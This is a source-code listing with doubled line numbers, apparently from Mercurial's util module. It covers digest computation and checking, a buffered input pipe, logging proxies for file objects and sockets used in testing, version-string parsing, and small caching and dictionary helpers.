183 183 DIGESTS = {
184 184 'md5': hashlib.md5,
185 185 'sha1': hashlib.sha1,
186 186 'sha512': hashlib.sha512,
187 187 }
188 188 # List of digest types from strongest to weakest
189 189 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
190 190
191 191 for k in DIGESTS_BY_STRENGTH:
192 192 assert k in DIGESTS
193 193
194 194 class digester(object):
195 195 """helper to compute digests.
196 196
197 197 This helper can be used to compute one or more digests given their name.
198 198
199 199 >>> d = digester([b'md5', b'sha1'])
200 200 >>> d.update(b'foo')
201 201 >>> [k for k in sorted(d)]
202 202 ['md5', 'sha1']
203 203 >>> d[b'md5']
204 204 'acbd18db4cc2f85cedef654fccc4a4d8'
205 205 >>> d[b'sha1']
206 206 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
207 207 >>> digester.preferred([b'md5', b'sha1'])
208 208 'sha1'
209 209 """
210 210
211 211 def __init__(self, digests, s=''):
212 212 self._hashes = {}
213 213 for k in digests:
214 214 if k not in DIGESTS:
215 215 raise error.Abort(_('unknown digest type: %s') % k)
216 216 self._hashes[k] = DIGESTS[k]()
217 217 if s:
218 218 self.update(s)
219 219
220 220 def update(self, data):
221 221 for h in self._hashes.values():
222 222 h.update(data)
223 223
224 224 def __getitem__(self, key):
225 225 if key not in DIGESTS:
226 226 raise error.Abort(_('unknown digest type: %s') % key)
227 227 return nodemod.hex(self._hashes[key].digest())
228 228
229 229 def __iter__(self):
230 230 return iter(self._hashes)
231 231
232 232 @staticmethod
233 233 def preferred(supported):
234 234 """returns the strongest digest type in both supported and DIGESTS."""
235 235
236 236 for k in DIGESTS_BY_STRENGTH:
237 237 if k in supported:
238 238 return k
239 239 return None
240 240
241 241 class digestchecker(object):
242 242 """file handle wrapper that additionally checks content against a given
243 243 size and digests.
244 244
245 245 d = digestchecker(fh, size, {'md5': '...'})
246 246
247 247 When multiple digests are given, all of them are validated.
248 248 """
249 249
250 250 def __init__(self, fh, size, digests):
251 251 self._fh = fh
252 252 self._size = size
253 253 self._got = 0
254 254 self._digests = dict(digests)
255 255 self._digester = digester(self._digests.keys())
256 256
257 257 def read(self, length=-1):
258 258 content = self._fh.read(length)
259 259 self._digester.update(content)
260 260 self._got += len(content)
261 261 return content
262 262
263 263 def validate(self):
264 264 if self._size != self._got:
265 265 raise error.Abort(_('size mismatch: expected %d, got %d') %
266 266 (self._size, self._got))
267 267 for k, v in self._digests.items():
268 268 if v != self._digester[k]:
269 269 # i18n: first parameter is a digest name
270 270 raise error.Abort(_('%s mismatch: expected %s, got %s') %
271 271 (k, v, self._digester[k]))
272 272
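# Usage sketch; 'fh', 'size' and 'expectedhex' are hypothetical values:
#
#   >>> checker = digestchecker(fh, size, {'sha1': expectedhex})
#   >>> while checker.read(4096):
#   ...     pass
#   >>> checker.validate()   # raises error.Abort on size or digest mismatch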
273 273 try:
274 274 buffer = buffer
275 275 except NameError:
276 276 def buffer(sliceable, offset=0, length=None):
277 277 if length is not None:
278 278 return memoryview(sliceable)[offset:offset + length]
279 279 return memoryview(sliceable)[offset:]
280 280
281 281 _chunksize = 4096
282 282
283 283 class bufferedinputpipe(object):
284 284 """a manually buffered input pipe
285 285
286 286 Python will not let us use buffered IO and lazy reading with 'polling' at
287 287 the same time. We cannot probe the buffer state and select will not detect
288 288 that data are ready to read if they are already buffered.
289 289
290 290 This class lets us work around that by implementing its own buffering
291 291 (allowing efficient readline) while offering a way to know if the buffer is
292 292 empty from the output (allowing collaboration of the buffer with polling).
293 293
294 294 This class lives in the 'util' module because it makes use of the 'os'
295 295 module from the python stdlib.
296 296 """
297 297 def __new__(cls, fh):
298 298 # If we receive a fileobjectproxy, we need to use a variation of this
299 299 # class that notifies observers about activity.
300 300 if isinstance(fh, fileobjectproxy):
301 301 cls = observedbufferedinputpipe
302 302
303 303 return super(bufferedinputpipe, cls).__new__(cls)
304 304
305 305 def __init__(self, input):
306 306 self._input = input
307 307 self._buffer = []
308 308 self._eof = False
309 309 self._lenbuf = 0
310 310
311 311 @property
312 312 def hasbuffer(self):
313 313 """True is any data is currently buffered
314 314
315 315 This will be used externally a pre-step for polling IO. If there is
316 316 already data then no polling should be set in place."""
317 317 return bool(self._buffer)
318 318
319 319 @property
320 320 def closed(self):
321 321 return self._input.closed
322 322
323 323 def fileno(self):
324 324 return self._input.fileno()
325 325
326 326 def close(self):
327 327 return self._input.close()
328 328
329 329 def read(self, size):
330 330 while (not self._eof) and (self._lenbuf < size):
331 331 self._fillbuffer()
332 332 return self._frombuffer(size)
333 333
334 334 def unbufferedread(self, size):
335 335 if not self._eof and self._lenbuf == 0:
336 336 self._fillbuffer(max(size, _chunksize))
337 337 return self._frombuffer(min(self._lenbuf, size))
338 338
339 339 def readline(self, *args, **kwargs):
340 340 if len(self._buffer) > 1:
341 341 # this should not happen because both read and readline end with a
342 342 # _frombuffer call that collapses it.
343 343 self._buffer = [''.join(self._buffer)]
344 344 self._lenbuf = len(self._buffer[0])
345 345 lfi = -1
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 while (not self._eof) and lfi < 0:
349 349 self._fillbuffer()
350 350 if self._buffer:
351 351 lfi = self._buffer[-1].find('\n')
352 352 size = lfi + 1
353 353 if lfi < 0: # end of file
354 354 size = self._lenbuf
355 355 elif len(self._buffer) > 1:
356 356 # we need to take previous chunks into account
357 357 size += self._lenbuf - len(self._buffer[-1])
358 358 return self._frombuffer(size)
359 359
360 360 def _frombuffer(self, size):
361 361 """return at most 'size' data from the buffer
362 362
363 363 The data are removed from the buffer."""
364 364 if size == 0 or not self._buffer:
365 365 return ''
366 366 buf = self._buffer[0]
367 367 if len(self._buffer) > 1:
368 368 buf = ''.join(self._buffer)
369 369
370 370 data = buf[:size]
371 371 buf = buf[len(data):]
372 372 if buf:
373 373 self._buffer = [buf]
374 374 self._lenbuf = len(buf)
375 375 else:
376 376 self._buffer = []
377 377 self._lenbuf = 0
378 378 return data
379 379
380 380 def _fillbuffer(self, size=_chunksize):
381 381 """read data to the buffer"""
382 382 data = os.read(self._input.fileno(), size)
383 383 if not data:
384 384 self._eof = True
385 385 else:
386 386 self._lenbuf += len(data)
387 387 self._buffer.append(data)
388 388
389 389 return data
390 390
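# Usage sketch, assuming 'proc' is a subprocess.Popen with stdout=PIPE and
# the select module is imported; check the buffer before polling so already
# buffered data is not missed:
#
#   >>> pipe = bufferedinputpipe(proc.stdout)
#   >>> if pipe.hasbuffer or select.select([pipe], [], [], 0)[0]:
#   ...     line = pipe.readline()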
391 391 def mmapread(fp):
392 392 try:
393 393 fd = getattr(fp, 'fileno', lambda: fp)()
394 394 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
395 395 except ValueError:
396 396 # Empty files cannot be mmapped, but mmapread should still work. Check
397 397 # if the file is empty, and if so, return an empty buffer.
398 398 if os.fstat(fd).st_size == 0:
399 399 return ''
400 400 raise
401 401
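# Usage sketch ('somepath' is hypothetical); the returned buffer can be
# sliced lazily instead of reading the whole file up front:
#
#   >>> with open(somepath, 'rb') as fp:
#   ...     data = mmapread(fp)
#   >>> header = data[:4]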
402 402 class fileobjectproxy(object):
403 403 """A proxy around file objects that tells a watcher when events occur.
404 404
405 405 This type is intended to only be used for testing purposes. Think hard
406 406 before using it in important code.
407 407 """
408 408 __slots__ = (
409 409 r'_orig',
410 410 r'_observer',
411 411 )
412 412
413 413 def __init__(self, fh, observer):
414 414 object.__setattr__(self, r'_orig', fh)
415 415 object.__setattr__(self, r'_observer', observer)
416 416
417 417 def __getattribute__(self, name):
418 418 ours = {
419 419 r'_observer',
420 420
421 421 # IOBase
422 422 r'close',
423 423 # closed if a property
424 424 r'fileno',
425 425 r'flush',
426 426 r'isatty',
427 427 r'readable',
428 428 r'readline',
429 429 r'readlines',
430 430 r'seek',
431 431 r'seekable',
432 432 r'tell',
433 433 r'truncate',
434 434 r'writable',
435 435 r'writelines',
436 436 # RawIOBase
437 437 r'read',
438 438 r'readall',
439 439 r'readinto',
440 440 r'write',
441 441 # BufferedIOBase
442 442 # raw is a property
443 443 r'detach',
444 444 # read defined above
445 445 r'read1',
446 446 # readinto defined above
447 447 # write defined above
448 448 }
449 449
450 450 # We only observe some methods.
451 451 if name in ours:
452 452 return object.__getattribute__(self, name)
453 453
454 454 return getattr(object.__getattribute__(self, r'_orig'), name)
455 455
456 456 def __nonzero__(self):
457 457 return bool(object.__getattribute__(self, r'_orig'))
458 458
459 459 __bool__ = __nonzero__
460 460
461 461 def __delattr__(self, name):
462 462 return delattr(object.__getattribute__(self, r'_orig'), name)
463 463
464 464 def __setattr__(self, name, value):
465 465 return setattr(object.__getattribute__(self, r'_orig'), name, value)
466 466
467 467 def __iter__(self):
468 468 return object.__getattribute__(self, r'_orig').__iter__()
469 469
470 470 def _observedcall(self, name, *args, **kwargs):
471 471 # Call the original object.
472 472 orig = object.__getattribute__(self, r'_orig')
473 473 res = getattr(orig, name)(*args, **kwargs)
474 474
475 475 # Call a method on the observer of the same name with arguments
476 476 # so it can react, log, etc.
477 477 observer = object.__getattribute__(self, r'_observer')
478 478 fn = getattr(observer, name, None)
479 479 if fn:
480 480 fn(res, *args, **kwargs)
481 481
482 482 return res
483 483
484 484 def close(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'close', *args, **kwargs)
487 487
488 488 def fileno(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'fileno', *args, **kwargs)
491 491
492 492 def flush(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'flush', *args, **kwargs)
495 495
496 496 def isatty(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'isatty', *args, **kwargs)
499 499
500 500 def readable(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readable', *args, **kwargs)
503 503
504 504 def readline(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readline', *args, **kwargs)
507 507
508 508 def readlines(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'readlines', *args, **kwargs)
511 511
512 512 def seek(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seek', *args, **kwargs)
515 515
516 516 def seekable(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'seekable', *args, **kwargs)
519 519
520 520 def tell(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'tell', *args, **kwargs)
523 523
524 524 def truncate(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'truncate', *args, **kwargs)
527 527
528 528 def writable(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writable', *args, **kwargs)
531 531
532 532 def writelines(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'writelines', *args, **kwargs)
535 535
536 536 def read(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'read', *args, **kwargs)
539 539
540 540 def readall(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readall', *args, **kwargs)
543 543
544 544 def readinto(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'readinto', *args, **kwargs)
547 547
548 548 def write(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'write', *args, **kwargs)
551 551
552 552 def detach(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'detach', *args, **kwargs)
555 555
556 556 def read1(self, *args, **kwargs):
557 557 return object.__getattribute__(self, r'_observedcall')(
558 558 r'read1', *args, **kwargs)
559 559
560 560 class observedbufferedinputpipe(bufferedinputpipe):
561 561 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
562 562
563 563 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
564 564 bypass ``fileobjectproxy``. Because of this, we need to make
565 565 ``bufferedinputpipe`` aware of these operations.
566 566
567 567 This variation of ``bufferedinputpipe`` can notify observers about
568 568 ``os.read()`` events. It also re-publishes other events, such as
569 569 ``read()`` and ``readline()``.
570 570 """
571 571 def _fillbuffer(self):
572 572 res = super(observedbufferedinputpipe, self)._fillbuffer()
573 573
574 574 fn = getattr(self._input._observer, r'osread', None)
575 575 if fn:
576 576 fn(res, _chunksize)
577 577
578 578 return res
579 579
580 580 # We use different observer methods because the operation isn't
581 581 # performed on the actual file object but on us.
582 582 def read(self, size):
583 583 res = super(observedbufferedinputpipe, self).read(size)
584 584
585 585 fn = getattr(self._input._observer, r'bufferedread', None)
586 586 if fn:
587 587 fn(res, size)
588 588
589 589 return res
590 590
591 591 def readline(self, *args, **kwargs):
592 592 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
593 593
594 594 fn = getattr(self._input._observer, r'bufferedreadline', None)
595 595 if fn:
596 596 fn(res)
597 597
598 598 return res
599 599
600 600 PROXIED_SOCKET_METHODS = {
601 601 r'makefile',
602 602 r'recv',
603 603 r'recvfrom',
604 604 r'recvfrom_into',
605 605 r'recv_into',
606 606 r'send',
607 607 r'sendall',
608 608 r'sendto',
609 609 r'setblocking',
610 610 r'settimeout',
611 611 r'gettimeout',
612 612 r'setsockopt',
613 613 }
614 614
615 615 class socketproxy(object):
616 616 """A proxy around a socket that tells a watcher when events occur.
617 617
618 618 This is like ``fileobjectproxy`` except for sockets.
619 619
620 620 This type is intended to only be used for testing purposes. Think hard
621 621 before using it in important code.
622 622 """
623 623 __slots__ = (
624 624 r'_orig',
625 625 r'_observer',
626 626 )
627 627
628 628 def __init__(self, sock, observer):
629 629 object.__setattr__(self, r'_orig', sock)
630 630 object.__setattr__(self, r'_observer', observer)
631 631
632 632 def __getattribute__(self, name):
633 633 if name in PROXIED_SOCKET_METHODS:
634 634 return object.__getattribute__(self, name)
635 635
636 636 return getattr(object.__getattribute__(self, r'_orig'), name)
637 637
638 638 def __delattr__(self, name):
639 639 return delattr(object.__getattribute__(self, r'_orig'), name)
640 640
641 641 def __setattr__(self, name, value):
642 642 return setattr(object.__getattribute__(self, r'_orig'), name, value)
643 643
644 644 def __nonzero__(self):
645 645 return bool(object.__getattribute__(self, r'_orig'))
646 646
647 647 __bool__ = __nonzero__
648 648
649 649 def _observedcall(self, name, *args, **kwargs):
650 650 # Call the original object.
651 651 orig = object.__getattribute__(self, r'_orig')
652 652 res = getattr(orig, name)(*args, **kwargs)
653 653
654 654 # Call a method on the observer of the same name with arguments
655 655 # so it can react, log, etc.
656 656 observer = object.__getattribute__(self, r'_observer')
657 657 fn = getattr(observer, name, None)
658 658 if fn:
659 659 fn(res, *args, **kwargs)
660 660
661 661 return res
662 662
663 663 def makefile(self, *args, **kwargs):
664 664 res = object.__getattribute__(self, r'_observedcall')(
665 665 r'makefile', *args, **kwargs)
666 666
667 667 # The file object may be used for I/O. So we turn it into a
668 668 # proxy using our observer.
669 669 observer = object.__getattribute__(self, r'_observer')
670 670 return makeloggingfileobject(observer.fh, res, observer.name,
671 671 reads=observer.reads,
672 672 writes=observer.writes,
673 673 logdata=observer.logdata,
674 674 logdataapis=observer.logdataapis)
675 675
676 676 def recv(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recv', *args, **kwargs)
679 679
680 680 def recvfrom(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom', *args, **kwargs)
683 683
684 684 def recvfrom_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recvfrom_into', *args, **kwargs)
687 687
688 688 def recv_into(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'recv_into', *args, **kwargs)
691 691
692 692 def send(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'send', *args, **kwargs)
695 695
696 696 def sendall(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendall', *args, **kwargs)
699 699
700 700 def sendto(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'sendto', *args, **kwargs)
703 703
704 704 def setblocking(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'setblocking', *args, **kwargs)
707 707
708 708 def settimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'settimeout', *args, **kwargs)
711 711
712 712 def gettimeout(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'gettimeout', *args, **kwargs)
715 715
716 716 def setsockopt(self, *args, **kwargs):
717 717 return object.__getattribute__(self, r'_observedcall')(
718 718 r'setsockopt', *args, **kwargs)
719 719
720 720 class baseproxyobserver(object):
721 721 def _writedata(self, data):
722 722 if not self.logdata:
723 723 if self.logdataapis:
724 724 self.fh.write('\n')
725 725 self.fh.flush()
726 726 return
727 727
728 728 # Simple case writes all data on a single line.
729 729 if b'\n' not in data:
730 730 if self.logdataapis:
731 731 self.fh.write(': %s\n' % stringutil.escapestr(data))
732 732 else:
733 733 self.fh.write('%s> %s\n'
734 734 % (self.name, stringutil.escapestr(data)))
735 735 self.fh.flush()
736 736 return
737 737
738 738 # Data with newlines is written to multiple lines.
739 739 if self.logdataapis:
740 740 self.fh.write(':\n')
741 741
742 742 lines = data.splitlines(True)
743 743 for line in lines:
744 744 self.fh.write('%s> %s\n'
745 745 % (self.name, stringutil.escapestr(line)))
746 746 self.fh.flush()
747 747
748 748 class fileobjectobserver(baseproxyobserver):
749 749 """Logs file object activity."""
750 750 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
751 751 logdataapis=True):
752 752 self.fh = fh
753 753 self.name = name
754 754 self.logdata = logdata
755 755 self.logdataapis = logdataapis
756 756 self.reads = reads
757 757 self.writes = writes
758 758
759 759 def read(self, res, size=-1):
760 760 if not self.reads:
761 761 return
762 762 # Python 3 can return None from reads at EOF instead of empty strings.
763 763 if res is None:
764 764 res = ''
765 765
766 766 if size == -1 and res == '':
767 767 # Suppress pointless read(-1) calls that return
768 768 # nothing. These happen _a lot_ on Python 3, and there
769 769 # doesn't seem to be a better workaround to have matching
770 770 # Python 2 and 3 behavior. :(
771 771 return
772 772
773 773 if self.logdataapis:
774 774 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
775 775
776 776 self._writedata(res)
777 777
778 778 def readline(self, res, limit=-1):
779 779 if not self.reads:
780 780 return
781 781
782 782 if self.logdataapis:
783 783 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
784 784
785 785 self._writedata(res)
786 786
787 787 def readinto(self, res, dest):
788 788 if not self.reads:
789 789 return
790 790
791 791 if self.logdataapis:
792 792 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
793 793 res))
794 794
795 795 data = dest[0:res] if res is not None else b''
796 796
797 797 # _writedata() uses "in" operator and is confused by memoryview because
798 798 # characters are ints on Python 3.
799 799 if isinstance(data, memoryview):
800 800 data = data.tobytes()
801 801
802 802 self._writedata(data)
803 803
804 804 def write(self, res, data):
805 805 if not self.writes:
806 806 return
807 807
808 808 # Python 2 returns None from some write() calls. Python 3 (reasonably)
809 809 # returns the integer bytes written.
810 810 if res is None and data:
811 811 res = len(data)
812 812
813 813 if self.logdataapis:
814 814 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
815 815
816 816 self._writedata(data)
817 817
818 818 def flush(self, res):
819 819 if not self.writes:
820 820 return
821 821
822 822 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
823 823
824 824 # For observedbufferedinputpipe.
825 825 def bufferedread(self, res, size):
826 826 if not self.reads:
827 827 return
828 828
829 829 if self.logdataapis:
830 830 self.fh.write('%s> bufferedread(%d) -> %d' % (
831 831 self.name, size, len(res)))
832 832
833 833 self._writedata(res)
834 834
835 835 def bufferedreadline(self, res):
836 836 if not self.reads:
837 837 return
838 838
839 839 if self.logdataapis:
840 840 self.fh.write('%s> bufferedreadline() -> %d' % (
841 841 self.name, len(res)))
842 842
843 843 self._writedata(res)
844 844
845 845 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
846 846 logdata=False, logdataapis=True):
847 847 """Turn a file object into a logging file object."""
848 848
849 849 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
850 850 logdata=logdata, logdataapis=logdataapis)
851 851 return fileobjectproxy(fh, observer)
852 852
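# Usage sketch: wrap a hypothetical file object 'fh' so its I/O is logged
# to stderr under the name 'myfile':
#
#   >>> proxy = makeloggingfileobject(procutil.stderr, fh, b'myfile',
#   ...                               logdata=True)
#   >>> proxy.write(b'hello')   # logs "myfile> write(5) -> 5: hello"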
853 853 class socketobserver(baseproxyobserver):
854 854 """Logs socket activity."""
855 855 def __init__(self, fh, name, reads=True, writes=True, states=True,
856 856 logdata=False, logdataapis=True):
857 857 self.fh = fh
858 858 self.name = name
859 859 self.reads = reads
860 860 self.writes = writes
861 861 self.states = states
862 862 self.logdata = logdata
863 863 self.logdataapis = logdataapis
864 864
865 865 def makefile(self, res, mode=None, bufsize=None):
866 866 if not self.states:
867 867 return
868 868
869 869 self.fh.write('%s> makefile(%r, %r)\n' % (
870 870 self.name, mode, bufsize))
871 871
872 872 def recv(self, res, size, flags=0):
873 873 if not self.reads:
874 874 return
875 875
876 876 if self.logdataapis:
877 877 self.fh.write('%s> recv(%d, %d) -> %d' % (
878 878 self.name, size, flags, len(res)))
879 879 self._writedata(res)
880 880
881 881 def recvfrom(self, res, size, flags=0):
882 882 if not self.reads:
883 883 return
884 884
885 885 if self.logdataapis:
886 886 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
887 887 self.name, size, flags, len(res[0])))
888 888
889 889 self._writedata(res[0])
890 890
891 891 def recvfrom_into(self, res, buf, size, flags=0):
892 892 if not self.reads:
893 893 return
894 894
895 895 if self.logdataapis:
896 896 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
897 897 self.name, size, flags, res[0]))
898 898
899 899 self._writedata(buf[0:res[0]])
900 900
901 901 def recv_into(self, res, buf, size=0, flags=0):
902 902 if not self.reads:
903 903 return
904 904
905 905 if self.logdataapis:
906 906 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
907 907 self.name, size, flags, res))
908 908
909 909 self._writedata(buf[0:res])
910 910
911 911 def send(self, res, data, flags=0):
912 912 if not self.writes:
913 913 return
914 914
915 915 self.fh.write('%s> send(%d, %d) -> %d' % (
916 916 self.name, len(data), flags, len(res)))
917 917 self._writedata(data)
918 918
919 919 def sendall(self, res, data, flags=0):
920 920 if not self.writes:
921 921 return
922 922
923 923 if self.logdataapis:
924 924 # Returns None on success. So don't bother reporting return value.
925 925 self.fh.write('%s> sendall(%d, %d)' % (
926 926 self.name, len(data), flags))
927 927
928 928 self._writedata(data)
929 929
930 930 def sendto(self, res, data, flagsoraddress, address=None):
931 931 if not self.writes:
932 932 return
933 933
934 934 if address:
935 935 flags = flagsoraddress
936 936 else:
937 937 flags = 0
938 938
939 939 if self.logdataapis:
940 940 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
941 941 self.name, len(data), flags, address, res))
942 942
943 943 self._writedata(data)
944 944
945 945 def setblocking(self, res, flag):
946 946 if not self.states:
947 947 return
948 948
949 949 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
950 950
951 951 def settimeout(self, res, value):
952 952 if not self.states:
953 953 return
954 954
955 955 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
956 956
957 957 def gettimeout(self, res):
958 958 if not self.states:
959 959 return
960 960
961 961 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
962 962
963 963 def setsockopt(self, res, level, optname, value):
964 964 if not self.states:
965 965 return
966 966
967 967 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
968 968 self.name, level, optname, value, res))
969 969
970 970 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
971 971 logdata=False, logdataapis=True):
972 972 """Turn a socket into a logging socket."""
973 973
974 974 observer = socketobserver(logh, name, reads=reads, writes=writes,
975 975 states=states, logdata=logdata,
976 976 logdataapis=logdataapis)
977 977 return socketproxy(fh, observer)
978 978
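# Usage sketch, mirroring makeloggingfileobject for a hypothetical socket:
#
#   >>> proxy = makeloggingsocket(procutil.stderr, sock, b'conn')
#   >>> proxy.sendall(b'ping')   # logs "conn> sendall(4, 0)"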
979 979 def version():
980 980 """Return version information if available."""
981 981 try:
982 982 from . import __version__
983 983 return __version__.version
984 984 except ImportError:
985 985 return 'unknown'
986 986
987 987 def versiontuple(v=None, n=4):
988 988 """Parses a Mercurial version string into an N-tuple.
989 989
990 990 The version string to be parsed is specified with the ``v`` argument.
991 991 If it isn't defined, the current Mercurial version string will be parsed.
992 992
993 993 ``n`` can be 2, 3, or 4. Here is how some version strings map to
994 994 returned values:
995 995
996 996 >>> v = b'3.6.1+190-df9b73d2d444'
997 997 >>> versiontuple(v, 2)
998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, 1)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, 1, '190-df9b73d2d444')
1003 1003
1004 1004 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1005 1005 (3, 6, 1, '190-df9b73d2d444+20151118')
1006 1006
1007 1007 >>> v = b'3.6'
1008 1008 >>> versiontuple(v, 2)
1009 1009 (3, 6)
1010 1010 >>> versiontuple(v, 3)
1011 1011 (3, 6, None)
1012 1012 >>> versiontuple(v, 4)
1013 1013 (3, 6, None, None)
1014 1014
1015 1015 >>> v = b'3.9-rc'
1016 1016 >>> versiontuple(v, 2)
1017 1017 (3, 9)
1018 1018 >>> versiontuple(v, 3)
1019 1019 (3, 9, None)
1020 1020 >>> versiontuple(v, 4)
1021 1021 (3, 9, None, 'rc')
1022 1022
1023 1023 >>> v = b'3.9-rc+2-02a8fea4289b'
1024 1024 >>> versiontuple(v, 2)
1025 1025 (3, 9)
1026 1026 >>> versiontuple(v, 3)
1027 1027 (3, 9, None)
1028 1028 >>> versiontuple(v, 4)
1029 1029 (3, 9, None, 'rc+2-02a8fea4289b')
1030 1030
1031 1031 >>> versiontuple(b'4.6rc0')
1032 1032 (4, 6, None, 'rc0')
1033 1033 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1034 1034 (4, 6, None, 'rc0+12-425d55e54f98')
1035 1035 >>> versiontuple(b'.1.2.3')
1036 1036 (None, None, None, '.1.2.3')
1037 1037 >>> versiontuple(b'12.34..5')
1038 1038 (12, 34, None, '..5')
1039 1039 >>> versiontuple(b'1.2.3.4.5.6')
1040 1040 (1, 2, 3, '.4.5.6')
1041 1041 """
1042 1042 if not v:
1043 1043 v = version()
1044 1044 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1045 1045 if not m:
1046 1046 vparts, extra = '', v
1047 1047 elif m.group(2):
1048 1048 vparts, extra = m.groups()
1049 1049 else:
1050 1050 vparts, extra = m.group(1), None
1051 1051
1052 1052 vints = []
1053 1053 for i in vparts.split('.'):
1054 1054 try:
1055 1055 vints.append(int(i))
1056 1056 except ValueError:
1057 1057 break
1058 1058 # (3, 6) -> (3, 6, None)
1059 1059 while len(vints) < 3:
1060 1060 vints.append(None)
1061 1061
1062 1062 if n == 2:
1063 1063 return (vints[0], vints[1])
1064 1064 if n == 3:
1065 1065 return (vints[0], vints[1], vints[2])
1066 1066 if n == 4:
1067 1067 return (vints[0], vints[1], vints[2], extra)
1068 1068
1069 1069 def cachefunc(func):
1070 1070 '''cache the result of function calls'''
1071 1071 # XXX doesn't handle keyword args
1072 1072 if func.__code__.co_argcount == 0:
1073 1073 cache = []
1074 1074 def f():
1075 1075 if len(cache) == 0:
1076 1076 cache.append(func())
1077 1077 return cache[0]
1078 1078 return f
1079 1079 cache = {}
1080 1080 if func.__code__.co_argcount == 1:
1081 1081 # we gain a small amount of time because
1082 1082 # we don't need to pack/unpack the list
1083 1083 def f(arg):
1084 1084 if arg not in cache:
1085 1085 cache[arg] = func(arg)
1086 1086 return cache[arg]
1087 1087 else:
1088 1088 def f(*args):
1089 1089 if args not in cache:
1090 1090 cache[args] = func(*args)
1091 1091 return cache[args]
1092 1092
1093 1093 return f
1094 1094
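# A minimal sketch: memoize a pure single-argument function.
#
#   >>> square = cachefunc(lambda x: x * x)
#   >>> square(3)   # computed
#   9
#   >>> square(3)   # served from the cache
#   9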
1095 1095 class cow(object):
1096 1096 """helper class to make copy-on-write easier
1097 1097
1098 1098 Call preparewrite before doing any writes.
1099 1099 """
1100 1100
1101 1101 def preparewrite(self):
1102 1102 """call this before writes, return self or a copied new object"""
1103 1103 if getattr(self, '_copied', 0):
1104 1104 self._copied -= 1
1105 1105 return self.__class__(self)
1106 1106 return self
1107 1107
1108 1108 def copy(self):
1109 1109 """always do a cheap copy"""
1110 1110 self._copied = getattr(self, '_copied', 0) + 1
1111 1111 return self
1112 1112
1113 1113 class sortdict(collections.OrderedDict):
1114 1114 '''a simple sorted dictionary
1115 1115
1116 1116 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1117 1117 >>> d2 = d1.copy()
1118 1118 >>> d2
1119 1119 sortdict([('a', 0), ('b', 1)])
1120 1120 >>> d2.update([(b'a', 2)])
1121 1121 >>> list(d2.keys()) # should still be in last-set order
1122 1122 ['b', 'a']
1123 1123 '''
1124 1124
1125 1125 def __setitem__(self, key, value):
1126 1126 if key in self:
1127 1127 del self[key]
1128 1128 super(sortdict, self).__setitem__(key, value)
1129 1129
1130 1130 if pycompat.ispypy:
